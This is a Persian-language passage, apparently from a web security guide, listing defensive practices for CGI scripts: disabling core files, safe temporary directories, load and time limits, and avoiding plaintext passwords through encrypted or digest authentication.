ﻧﻜﻨﻴﺪ ،ﭼﺮﺍﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺗﺎﺑﻊ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺯ ﺗﺎﺑﻊ )( openﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﻳﻜﻲ ﺍﺯ ﺣﺎﻻﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺭﻗﺎﺑﺖ
ﺍﺳﺖ.
.١٤ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﺟﺰ ﻫﻨﮕﺎﻡ ﺁﺯﻣﺎﻳﺶ ﺩﺭ ﺣﺎﻟﺘﻲ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ coreﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ .ﻓﺎﻳﻠﻬـﺎﻱ coreﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻛـﻞ ﻳـﻚ
ﺩﻳﺴﻚ ﺭﺍ ﺍﺷﻐﺎﻝ ﻛﻨﻨﺪ ،ﻭ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻨﺪ .ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻣﻬﺎﺟﻢ ﺗﻨﻬﺎ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ
ﻧﻜﺘﻪ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻓﺎﻳﻠﻬﺎﻱ coreﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﻨﺪ .ﺑﺠـﺎﻱ ﺫﺧﻴـﺮﻩ ﻛـﺮﺩﻥ ﻓﺎﻳﻠﻬـﺎﻱ core
ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﺛﺒﺖ ﻛﻨﺪ ﻭ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺧﺎﺭﺝ ﺷﻮﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺣـﺪﺍﻛﺜﺮ ﺍﻧـﺪﺍﺯﺓ ﻓﺎﻳـﻞ coreﺭﺍ
"ﺻﻔﺮ" ﻗﺮﺍﺭ ﺩﻫﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺎﺑﻊ )( setrlimitﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
.١٥ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺷﺎﺧﻪﻫﺎﻳﻲ ﻛﻪ ﻫﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺑﻨﻮﻳﺴﻨﺪ ﺍﻳﺠﺎﺩ ﻧﻜﻨﻴﺪ .ﺍﮔﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ
" "nobodyﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ ،ﻛﺎﺭﺑﺮ nobodyﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺎﻟﻚ ﺷﺎﺧﻪﺍﻱ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺁﻥ ﺑﻪ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬـﺎ ﺑﭙـﺮﺩﺍﺯﺩ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺑﺮﺍﻱ ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭ ﻳﺎ ﺣﺪﺍﻗﻞ ﻫﺮ ﻣﺠﻤﻮﻋﺔ ﻣﺮﺗﺒﻂ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻛـﻪ ﺯﻳﺮﺳﻴـﺴﺘﻢ ﻧﺎﻣﻴـﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ،ﻓـﻀﺎﻳﻲ
ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺘﻲ ﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ )ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻳﻚ ﺷﺎﺧﺔ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺘﻲ ﺑﺪﻫﻴﺪ،
ﻭ ﻳﺎ ﻫﺮ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻠﺰﻡ ﻛﻨﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﻗﺘﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﻧﺎﻣﮕﺬﺍﺭﻱ ﻛﻨﺪ ﻛﻪ ﻫﻤﻪ ﺑﺎ ﻧﺎﻡ ﺧﻮﺩ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣـﻪ ﺷـﺮﻭﻉ ﺷـﺪﻩ ﺑﺎﺷـﻨﺪ( .ﭼﻨﺎﻧﭽـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﻮﺍﺑﻊ ﭘﻮﺳﺘﺔ Unixﻫﻢ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ،ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ ﺭﺍ ﺩﺭ ﺷـﺎﺧﺔ /tmp
ﺫﺧﻴﺮﻩ ﻧﻨﻤﺎﻳﻴﺪ.
.١٦ﺑﻪ ﺁﺩﺭﺱ IPﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺯﻳﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻧﻜﻨﻴﺪ .ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ proxy
ﺟﻌﻞ ،ﺩﺳﺘﻜﺎﺭﻱ ،ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺷﺪﻩ ﺑﺎﺷﻨﺪ.
.١٧ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺧﻮﺩ ﻧﻮﻋﻲ ﺍﺯ ﺗﻘﺴﻴﻢ ﺑﺎﺭ ٢٢٣ﻭ ﻳﺎ ﻣﺤﺪﻭﺩﻳﺖ ﺑﺎﺭ ٢٢٤ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺑﺎﺭﮔﺬﺍﺭﻳﻬﺎﻱ ﺳﻨﮕﻴﻦ ﻫﻢ ﻗﺎﺑﻞ ﻣـﺪﻳﺮﻳﺖ ﺷـﻮﻧﺪ.
ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻥ ،ﻣﻴﺰﺍﻥ ﺑﺎﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻛﻨﻨـﺪ ﻭﻣﺜ ﹰ
ﭼﻨﺎﻧﭽﻪ ﻣﻘﺪﺍﺭ ﺁﻥ ﺍﺯ ﻳﻚ ﺳﻘﻒ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﻴﺸﺘﺮ ﺑﻮﺩ ،ﺑﺎ ﻧﻤﺎﻳﺶ ﻳﻚ ﭘﻴﺎﻡ ﻣﺤﺘﺮﻣﺎﻧﻪ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺯ ﺣﺎﻓﻈﻪ ﺧﺎﺭﺝ ﺷﻮﻧﺪ .ﺍﻧﺠﺎﻡ
ﺍﻳﻨﻜﺎﺭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺎ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﻣﺘﻌﺪﺩ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻋﻠﻴﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﺍﺳﺖ ﺑﺎ ﺩﺷﻮﺍﺭﻱ ﺑﻴﺸﺘﺮﻱ ﺭﻭﺑﺮﻭ ﺷﻮﺩ .ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺻﺪﻫﺎ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺳﺮﻳﻌﺘﺮ ﺍﺟﺮﺍ ﺷـﺪﻥ
ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻛﹸﻨﺪ ،ﺩﻛﻤﺔ reloadﺭﺍ ﻓﺸﺎﺭ ﻣﻲﺩﻫﻨﺪ ،ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺷﻤﺎ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ.
.١٨ﺑﺮﺍﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺳﻘﻒ ﺯﻣﺎﻧﻲ ﻣﻨﺎﺳﺐ ﻭ ﻣﻌﻘﻮﻝ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ .ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﻪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﺘﻮﻗـﻒ
ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺩﺭﺧﻮﺍﺳﺖ ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑﻲﺟﻮﺍﺏ ﺑﻤﺎﻧـﺪ ،ﻳـﺎ ﻳـﻚ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺍﺯ ﻗﺒـﻮﻝ ﮔﺮﺩﺩ؛ ﻣﺜ ﹰ
ﻛﺮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺍﺯ ﻃﺮﻑ ﺷﻤﺎ ﺍﻣﺘﻨﺎﻉ ﻭﺭﺯﺩ .ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺣﻞ ﺍﻳﻦ ﺩﻭ ﻣـﺸﻜﻞ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺯﻣﺎﻧﻴﻜـﻪ
ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ CGIﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻣﺤﺪﻭﺩﻳﺖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻪ ﻣﺤـﺾ ﺍﻳﻨﻜـﻪ ﺑﺮﻧﺎﻣـﻪ ﺍﺯ
ﺳﻘﻒ ﺯﻣﺎﻧﻲ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺗﺠﺎﻭﺯ ﻛﻨﺪ ،ﺑﺎﻳﺪ ﻓﻀﺎﻱ ﺣﺎﻓﻈﻪ ﺭﺍ ﺧﺎﻟﻲ ﻛﻨـﺪ ﻭ ﺍﺯ ﺁﻥ ﺧـﺎﺭﺝ ﺷـﻮﺩ .ﺩﺭ ﺑﻴـﺸﺘﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧـﻮﻳﻦ ﺑـﺮﺍﻱ
ﺑﺮﻗﺮﺍﺭﻱ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﻮﻋﻲ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
.١٩ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ CGIﺩﺭﺣﺎﻝ ﺍﺟﺮﺍﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ،ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻣﻌﻘﻮﻝ ﻭ ﻣﻨﻄﻘﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻳـﻚ ﺍﺷـﻜﺎﻝ
ﺟﺰﺋﻲ ﺩﺭ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ CGIﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﺮﺍ ﺩﺭ ﻳﻚ ﺣﻠﻘﺔ ﺑﻴﻨﻬﺎﻳﺖ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
ﻭﺏ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ،ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣﺠﻤﻮﻉ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ CGIﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧـﺪﻩ ﻣـﺼﺮﻑ ﻛﻨﻨـﺪ،
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺳﻔﺖ ﻭ ﺳﺨﺘﻲ ﻗﺮﺍﺭ ﺩﺍﺩ.
.٢٠ﺍﺯ ﻛﺎﺭﺑﺮ ﻧﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻮﺩ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﻣﺘﻦﺳﺎﺩﻩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﻔﺮﺳﺘﺪ .ﺍﮔـﺮ
ﺍﺯ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻳﺪ ﺗﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﺩﺭ ﻗﺎﻟﺐ ﻣﺘﻦﺳﺎﺩﻩ ﻣﻨﺘﻘﻞ ﻧﺸﻮﺩ .ﻫﻤﭽﻨﻴﻦ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺍﺯ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺳـﻤﺖ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺷﻤﺎ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻭﺭﮔﺮ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ IISﺩﺳﺘﺮﺳـﻲ
ﭘﻴﺪﺍ ﻛﻨﻨﺪ ،ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻗﺎﺑﻠﻴﺖ - ٢٢٥NTLMﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ HTTPﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ -
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻼﺻﺔ - ٢٢٦HTTPﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺘﺮﻙ ﻣﻴـﺎﻥ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ،ﻳﻚ MD5 MACﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﺩ -ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Apache 2.0ﻭ ﻧﺴﺨﻪﻫـﺎﻱ
ﺟﺪﻳﺪﺗﺮ ﺍﺯ ﺁﻥ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺧﻼﺻﻪﺳﺎﺯﻱ ) (Digest-basedﺑـﺎ ﻣـﺎﺟﻮﻝ mod_auth_digestﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻣﻲﻛﻨﺪ ،ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﻴـﺰ ﺭﻭ ﺑـﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ .ﻳـﻚ ﺍﺷـﻜﺎﻝ ﺍﻭﻟﻴـﺔ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻣﺒﺘﻨـﻲ ﺑـﺮ
ﺧﻼﺻﻪﺳﺎﺯﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺭﻭﺵ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻳـﻚ ﻧـﺴﺨﺔ ﺭﻣﺰﻧـﺸﺪﻩ ﺍﺯ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻫﺮﻳـﻚ ﺍﺯ
ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺧﻼﺻﻪﺳﺎﺯﻱ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭ ﻣـﺴﺘﻨﺪﺍﺕ
Apacheﺑﺪﻧﺒﺎﻝ ﻛﻠﻤﺔ AuthDigestFileﺑﮕﺮﺩﻳﺪ ﻭ ﻳﺎ ﺑﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ:
http://www.apache.org/doc-2.0/mod/mod_auth_digest.html
.٢١ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺧﻮﺩﺗﺎﻥ ﺍﺯ ﭼﻪ ﺭﺍﻫﻬﺎﻳﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ ،ﻭ ﺍﮔـﺮ ﺑﺮﻧﺎﻣـﻪ ﻭﺭﻭﺩﻱ
ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﭼﻪ ﻋﻤﻠﻜﺮﺩﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻣﻴﺎﻥ ﺩﻭ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺳﻴـﺴﺘﻤﻲ ﺍﻳﺠـﺎﺩ
ﺗﺄﺧﻴﺮ ﻧﻤﺎﻳﻴﺪ ،ﺗﺄﺛﻴﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮ ﻋﻤﻠﻜﺮﺩ ﺑﺮﻧﺎﻣﻪ ﭼﻪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻘﻴﻘﺖ ﺧﻄﺎﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻫﺴﺘﻨﺪ .ﺍﺯ ﻳﻚ ﻧﻈﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺧﺒـﺮ ﺧـﻮﺑﻲ
ﺗﻠﻘﻲ ﺷﻮﺩ ،ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﺮﭼﻘﺪﺭ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻛﻨﻨﺪ ،ﺩﺭ ﻭﺍﻗﻊ ﺁﻧﺮﺍ ﻣﻄﻤﺌﻨﺘﺮ ﻭ ﻗﺎﺑﻞﺍﺗﻜﺎﺗﺮ ﻛﺮﺩﻩﺍﻧﺪ.
ﻼ ﻫﻤﺎﻫﻨﮓ ﺑﺎﺷﻨﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﭼﻴﺰﻱ ﺣﺘﻲ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﻣﻮﺍﺭﺩ ،ﻳﺎﻓﺘﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻭ ﻣﺮﻭﺭﮔﺮ ﺑﺎ ﻫﻢ ﻛﺎﻣ ﹰ
ﻛﻪ ﻛﻞ ﻓﺮﺁﻳﻨﺪ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺍﺷﻜﺎﻝ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ،ﻃﺒﻖ ﺗﻌﺮﻳﻒ ،ﻗﻮﺍﻧﻴﻦ ﺑﺎﺯﻱ ﺭﺍ ﺭﻋﺎﻳﺖ ﻧﻤـﻲﻛﻨﻨـﺪ .ﻣﻄﻤﺌﻨـﹰﺎ
ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﺮﻣﻬﺎﻱ HTMLﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ JavaScriptﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺑﺎﺯ ﻛﻨﻨـﺪ ﺗـﺎ ﻣـﺸﻜﻠﻲ ﭘـﻴﺶ ﻧﻴﺎﻳـﺪ ،ﺍﻣـﺎ
ﻼ ﻣـﻮﺭﺩﻱ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﻧﺠﺎﻡ ﻧﺪﺍﺩﻥ ﺍﻳﻨﻜﺎﺭ ،ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺑﺎﻳﻨﺪ ،ﺗﺤﻠﻴﻞ ﻛﻨﻨﺪ ،ﻭ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺷـﻤﺎ ﭘﺎﺳـﺨﻬﺎﻱ ﻛـﺎﻣ ﹰ
ﻣﻐﺮﺿﺎﻧﻪ ﺑﻔﺮﺳﺘﻨﺪ .ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻼﺕ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ،ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻌﻤﻮﻟﻲ ﻭﺏ ﻛـﺎﺭ ﺳـﺎﺩﻩﺍﻱ ﻧﻴـﺴﺖ ﻛـﻪ
ﺑﺘﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻨﺪ؛ ﻭ ﺩﺭ ﻫﺮﺣﺎﻝ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺣﻤـﻼﺕ ﻣﻤﻜـﻦ
